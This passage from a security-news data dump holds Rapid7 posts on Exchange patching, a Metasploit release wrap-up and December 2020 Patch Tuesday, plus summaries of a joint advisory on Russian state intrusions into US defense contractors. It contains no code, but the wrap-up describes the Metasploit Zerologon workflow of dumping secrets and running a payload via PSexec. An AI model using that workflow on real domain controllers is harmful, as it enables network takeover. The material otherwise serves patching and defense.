Additionally, the newest version of Windows Server that Exchange 2007 runs on is Windows Server 2008 R2, which reached EoS in January 2020. In summary, this is a business-critical application running in an environment in which vulnerabilities will not be fixed.\n\n\n\n## Exchange 2013: The twilight years\n\nExchange 2013 transitioned to Extended Support in 2018 and will cease to be supported at all on April 11, 2023. Additionally, the newest version of Windows Server that Exchange 2013 runs on is Windows Server 2012 R2, [which reaches EoS on Oct. 10, 2023](<https://docs.microsoft.com/en-us/lifecycle/products/windows-server-2012-r2>). In short, the full Exchange 2013 environment, other than AD, will be **completely unsupported** in less than three years.\n\nOur Project Sonar metrics for OWA show that there are at least 102,593 Exchange 2013 servers on the public internet. Further, 67,567 (~66%) are not running a version of Exchange that Microsoft considers \"Supported.\"\n\n\n\nGiven that Exchange is typically considered a business-critical application, and how complex an upgrade can be, we strongly recommend that organizations running Exchange 2013 start planning the upgrade process and timeline. The \"Upgrading considerations\" portion of the \"Taking actions\" section at the end of the blog post calls out a few of the considerations that might make this process time-consuming or challenging.\n\n## Exchange 2016 and 2019: Newer, but still vulnerable\n\nWhile Exchange 2016 and 2019 will be supported for some time to come, organizations running them appear to be doing a poor job of keeping their environments up-to-date.\n\nOf the ~138,000 Exchange 2016 servers, 87% were missing the most recent updates.\n\n\n\nSimilarly, 77% of the ~25,000 Exchange 2019 servers we observed were missing updates. 
There are nearly 2,100 that, as far as we can tell, have _never_ had updates installed.\n\n\n\n## Taking action\n\nGiven the potential risks that a compromised Exchange environment presents, we have the following recommendations:\n\n * Organizations using Exchange 2010 or earlier should aggressively pursue upgrading their environment to supported technologies.\n * Organizations using Exchange 2013 should ensure they have a plan and timeline for upgrading to supported technologies by April 11, 2023. Remember that the most modern version of Windows Server that 2013 supports is also going EoS that year, so the process may introduce new server OSes into the environment as well. Please see the "Upgrading considerations" section below for some of the challenges that may need to be accounted for.\n * Organizations using Exchange 2016 or on-premises 2019 should ensure their Exchange environment is currently up-to-date and that there is a plan and process for keeping it updated.\n * Organizations using Exchange hosted by a non-Microsoft vendor should ensure the vendor has a plan and process for keeping the software up-to-date. They should also verify this is being done and hold the vendor accountable if not.\n * Leverage [vulnerability management tools](<https://www.rapid7.com/products/insightvm/>) and other types of tools to detect when Exchange environments are missing updates. They will be particularly helpful when Exchange version numbers cannot be reliably determined.\n\n### Upgrading considerations\n\nUpgrading an Exchange environment is a very complex task that is compounded by the server and client dependencies. This is why planning in advance is critical. Here are some examples of issues organizations may run into when planning an upgrade:\n\n * **Upgrading from Exchange 2010:** There is no direct upgrade path from Exchange 2010 to Exchange 2019. 
Organizations will need to upgrade to Exchange 2013 or 2016 first.\n * **Active Directory (AD) server OS:** Exchange 2019 doesn't support Windows Server 2012 AD servers and requires the AD forest functional level to be at least 2012 R2.\n * **TLS:** Exchange 2019, by default, requires TLS 1.2. This means that clients will need to support TLS 1.2, or other workarounds will need to be implemented in order to support legacy clients.\n * **Outlook compatibility:** Exchange 2019 requires at least Outlook 2013 with the most recent updates. Keep in mind that Outlook 2013 goes EoS April 11, 2023, so those leveraging it should upgrade to Outlook 2016 or higher.\n * **Unified Messaging (UM):** UM was removed in Exchange 2019.\n * **Web browser compatibility:** Exchange 2019 doesn't support Internet Explorer 10 or lower.", "cvss3": {}, "published": "2020-09-29T16:05:16", "type": "rapid7blog", "title": "Microsoft Exchange 2010 End of Support and Overall Patching Study", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-09-29T16:05:16", "id": "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "href": "https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T20:40:17", "description": "## SAP Internet Graphics Server (IGS)\n\n\n\nThis week includes a new module targeting the SAP Internet Graphics Server application, contributed by community member [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>). This particular module covers two CVEs that are both XML External Entity (XXE) bugs that are remotely exploitable. The module comes fully featured with the ability to check for the presence of the vulnerabilities as well as two methods to leverage them. 
The first is a read action that allows users to read files from the remote server, while the second can be used to trigger a denial of service (DoS) condition.\n\n## Just read the (new Zerologon) docs\n\nThe module documentation for the Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=wrapup>)) module has been updated with details of how to run the entire attack workflow through Metasploit. This specifically included leveraging the new `auxiliary/gather/windows_secrets_dump` which can recover the machine password to restore on the targeted Domain Controller and using the PSexec module to execute a payload. It\u2019s important to restore the machine account password to prevent services from breaking. Module documentation can be accessed from msfconsole by using the `info -d` command. The most recent Metasploit Demo meeting also covered this content, [showing](<https://www.youtube.com/watch?v=Z5oQmHVsqjA&t=1648>) the newly documented workflow in action.\n\n## New modules (1)\n\n * [SAP Internet Graphics Server (IGS) XMLCHART XXE](<https://github.com/rapid7/metasploit-framework/pull/14163>) by Vladimir Ivanov and Yvan Genuer, which exploits [CVE-2018-2393](<https://attackerkb.com/topics/EmAs1SnpOK/cve-2018-2393?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Update sap_service_discovery.rb to support discovering SAP IGS servers](<https://github.com/rapid7/metasploit-framework/pull/14238>) by Vladimir Ivanov\n * [Tab-completion improved for module OPTIONS not available](<https://github.com/rapid7/metasploit-framework/pull/14070>) by mariabelenTC\n * [Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates](<https://github.com/rapid7/metasploit-framework/pull/14213>) by Alan David Foster\n * [Add the DOMAIN option to the CVE-2020-0688 Exploit](<https://github.com/rapid7/metasploit-framework/pull/14190>) by Spencer McIntyre\n * [Update the module docs for CVE-2020-1472 
(Zerologon)](<https://github.com/rapid7/metasploit-framework/pull/14204>) by Spencer McIntyre\n\n## Bugs fixed\n\n * [Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error](<https://github.com/rapid7/metasploit-framework/pull/14028>) by Alan David Foster\n * [Always show module actions within the info command](<https://github.com/rapid7/metasploit-framework/pull/14233>) by Alan David Foster\n * [Remove modules whose deprecation date has passed](<https://github.com/rapid7/metasploit-framework/pull/14242>) by Spencer McIntyre\n * [Convert myworkspace.id to myworkspace_id for no db compat](<https://github.com/rapid7/metasploit-framework/pull/14226>) by h00die\n * [Disconnect the named pipe and break after the impersonation callback](<https://github.com/rapid7/metasploit-payloads/pull/438>) by Spencer McIntyre\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-01T17%3A52%3A23%2B01%3A00..2020-10-08T11%3A41%3A44-05%3A00%22>)\n * [Full diff 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/compare/6.0.9...6.0.10>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-09T19:41:47", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-2393", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-10-09T19:41:47", "id": "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "href": "https://blog.rapid7.com/2020/10/09/metasploit-wrap-up-82/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-12T10:47:13", "description": "\n\nWe close off our 2020 year of Patch Tuesdays with 58 vulnerabilities being addressed. While it's a higher count than our typical December months (high thirties), it's still a nice breath of fresh air given how the past year has been. We do, however, get to celebrate that none of the reported vulnerabilities covered this month has been publicly exploited nor previously publicly disclosed, and only 9 of the 58 vulnerabilities have been marked as Critical by Microsoft.\n\nIn terms of actionables, standard procedures can be followed for prioritizing which sets of patches to apply first, with two exceptions.\n\n## Microsoft Office vulnerabilities\n\nA fair number of remote code execution vulnerabilities targeting Microsoft Excel are being patched today, and while none of them have the Preview Pane as an attack vector, the volume of remote code execution vulnerabilities pertaining to Microsoft Office this month may suggest a slight re-jig of priorities. 
That's our first (minor) exception.\n\nThe next exception is likely the most notable piece behind this December 2020 Patch Tuesday: Microsoft Exchange Server.\n\n## Microsoft Exchange Server vulnerabilities\n\nWhile there are a total of six vulnerabilities from Microsoft Exchange Server this month, two of them garner a CVSS score of 9.1 ([CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>), [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>)) and one is noted by Microsoft as having a higher chance of exploitability ([CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>)). These three warrant additional examination and may be grounds for prioritizing patching.\n\nThere is currently suspicion that [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) helps address the patch bypass of [CVE-2020-16875](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16875>) (CVSS 8.4) from September 2020. In addition, both [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) and [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>) are remote code execution vulnerabilities occurring due to improper validation of cmdlet arguments that affect all supported (as of writing) versions of Microsoft Exchange. 
One important note: while these vulnerabilities have received a CVSS score of 9.1 and do not require additional user interaction, an attacker must be authenticated in order to exploit them.\n\nIn contrast, [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>), another remote code execution vulnerability also stemming from improper validation of cmdlet arguments, only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully exploit. This is extra interesting as [Microsoft Exchange Server 2010 passed end of life back on October 22, 2020](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). The introduction of this post-EOL patch for Microsoft Exchange Server 2010, coupled with Microsoft noting this vulnerability to be more likely exploitable, does suggest prioritizing this patch a bit earlier.\n\n## New Summary Tables\n\nTo provide a more concise summary, here are this month's patched vulnerabilities split by product family.\n\n### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17160>) | Azure Sphere Security Feature Bypass Vulnerability | False | False | 7.4 | True \n[CVE-2020-16971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16971>) | Azure SDK for Java Security Feature Bypass Vulnerability | False | False | 7.4 | False \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17153>) | Microsoft Edge for Android Spoofing Vulnerability | False | False | 4.3 | True 
\n[CVE-2020-17131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17131>) | Chakra Scripting Engine Memory Corruption Vulnerability | False | False | 4.2 | False \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17148>) | Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17150>) | Visual Studio Code Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17156>) | Visual Studio Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17159>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17002>) | Azure SDK for C Security Feature Bypass Vulnerability | False | False | 7.4 | False \n[CVE-2020-17135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17135>) | Azure DevOps Server Spoofing Vulnerability | False | False | 6.4 | False \n[CVE-2020-17145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17145>) | Azure DevOps Server and Team Foundation Services Spoofing Vulnerability | False | False | 5.4 | False \n \n### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17140>) | Windows SMB Information Disclosure 
Vulnerability | False | False | 8.1 | True \n[CVE-2020-16958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16958>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16959>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16960>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16961>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16962>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16963>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16964>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17098>) | Windows GDI+ Information Disclosure Vulnerability | False | False | 5.5 | True \n \n### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True 
\n[CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17143>) | Microsoft Exchange Information Disclosure Vulnerability | False | False | 8.8 | True \n[CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 6.6 | False \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17147>) | Dynamics CRM Webclient Cross-site Scripting Vulnerability | False | False | 8.7 | True \n[CVE-2020-17133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17133>) | Microsoft Dynamics Business Central/NAV Information Disclosure | False | False | 6.5 | True \n \n### Microsoft Office 
Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.1 | False \n[CVE-2020-17115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17115>) | Microsoft SharePoint Spoofing Vulnerability | False | False | 8 | True \n[CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17124>) | Microsoft PowerPoint Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True 
\n[CVE-2020-17089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17089>) | Microsoft SharePoint Elevation of Privilege Vulnerability | False | False | 7.1 | False \n[CVE-2020-17119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17119>) | Microsoft Outlook Information Disclosure Vulnerability | False | False | 6.5 | True \n[CVE-2020-17130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17130>) | Microsoft Excel Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17126>) | Microsoft Excel Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17120>) | Microsoft SharePoint Information Disclosure Vulnerability | False | False | 5.3 | True \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>) | Hyper-V Remote Code Execution Vulnerability | False | False | 8.5 | True \n[CVE-2020-17092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17092>) | Windows Network Connections Service Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17134>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17136>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17137>) 
| DirectX Graphics Kernel Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17139>) | Windows Overlay Filter Security Feature Bypass Vulnerability | False | False | 7.8 | False \n[CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>) | Windows NTFS Remote Code Execution Vulnerability | False | False | 7.5 | True \n[CVE-2020-17103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17103>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7 | False \n[CVE-2020-17099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17099>) | Windows Lock Screen Security Feature Bypass Vulnerability | False | False | 6.8 | True \n[CVE-2020-16996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16996>) | Kerberos Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17094>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17138>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17097>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | False | False | 3.3 | False \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2020-12-08T21:36:27", "type": "rapid7blog", "title": "Patch Tuesday - December 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", 
"CVE-2020-16971", "CVE-2020-16996", "CVE-2020-17002", "CVE-2020-17089", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17115", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17119", "CVE-2020-17120", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17124", "CVE-2020-17125", "CVE-2020-17126", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17130", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17133", "CVE-2020-17134", "CVE-2020-17135", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17143", "CVE-2020-17144", "CVE-2020-17145", "CVE-2020-17147", "CVE-2020-17148", "CVE-2020-17150", "CVE-2020-17152", "CVE-2020-17153", "CVE-2020-17156", "CVE-2020-17158", "CVE-2020-17159", "CVE-2020-17160"], "modified": "2020-12-08T21:36:27", "id": "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "href": "https://blog.rapid7.com/2020/12/08/patch-tuesday-december-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-02-18T13:30:09", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here In a joint cybersecurity advisory, the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) revealed that Russian state-sponsored threat actors targeted U.S. defense contractors from January 2020 to February 2022. The threat actors exfiltrated sensitive data from small and large companies in the U.S. working on defense and intelligence contracts, including missile development, vehicle & aircraft and software development. Threat actors gain initial access by using brute force to identify valid account credentials for domain and M365 accounts. 
Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources such as SharePoint pages, user profiles, and user emails. They further used harvested credentials in conjunction with known vulnerabilities CVE-2020-0688 & CVE-2020-17144 in Microsoft Exchange Server to escalate privileges and gain remote code execution (RCE) on the exposed applications. In addition, they have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database "ntds.dit". In multiple breaches, they maintained persistence for at least 6 months in the network, continuously exfiltrating sensitive emails and data. Organizations can mitigate the risk by following the recommendations: \u2022 Monitor the use of stolen credentials. \u2022 Keep all operating systems and software up to date. \u2022 Enable multifactor authentication (MFA) for all users, without exception. 
The techniques commonly used by the Russian cyber actor APT28 are:\n\u2022 TA0043: Reconnaissance\n\u2022 TA0001: Initial Access\n\u2022 TA0004: Privilege Escalation\n\u2022 TA0005: Defense Evasion\n\u2022 TA0006: Credential Access\n\u2022 TA0007: Discovery\n\u2022 TA0009: Collection\n\u2022 TA0003: Persistence\n\u2022 TA0008: Lateral Movement\n\u2022 TA0011: Command and Control\n\u2022 T1027: Obfuscated Files or Information\n\u2022 T1133: External Remote Services\n\u2022 T1190: Exploit Public-Facing Application\n\u2022 T1083: File and Directory Discovery\n\u2022 T1482: Domain Trust Discovery\n\u2022 T1213.002: Data from Information Repositories: SharePoint\n\u2022 T1090.003: Proxy: Multi-hop Proxy\n\u2022 T1589.001: Gather Victim Identity Information: Credentials\n\u2022 T1003.003: OS Credential Dumping: NTDS\n\u2022 T1110.003: Brute Force: Password Spraying\n\u2022 T1566.002: Phishing: Spearphishing Link\n\u2022 T1078.002: Valid Accounts: Domain Accounts\n\u2022 T1078.004: Valid Accounts: Cloud Accounts\nReferences: https://www.cisa.gov/uscert/ncas/alerts/aa22-047a", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-18T12:20:35", "type": "hivepro", "title": "Russian state-sponsored cyber actors targeting U.S. 
critical infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-18T12:20:35", "id": "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8", "href": "https://www.hivepro.com/russian-state-sponsored-cyber-actors-targeting-u-s-critical-infrastructure/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-03-14T18:28:23", "description": "### Summary\n\n_Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:_ \n\u2022 Enforce multifactor authentication. \n\u2022 Enforce strong, unique passwords. \n\u2022 Enable M365 Unified Audit Logs. \n\u2022 Implement endpoint detection and response tools.\n\nFrom at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. 
Department of Defense (DoD) and Intelligence Community in the following areas:\n\n * Command, control, communications, and combat systems;\n * Intelligence, surveillance, reconnaissance, and targeting;\n * Weapons and missile development;\n * Vehicle and aircraft design; and\n * Software development, data analytics, computers, and logistics. \n\nHistorically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data. \n\nIn many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.\n\nThese continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign 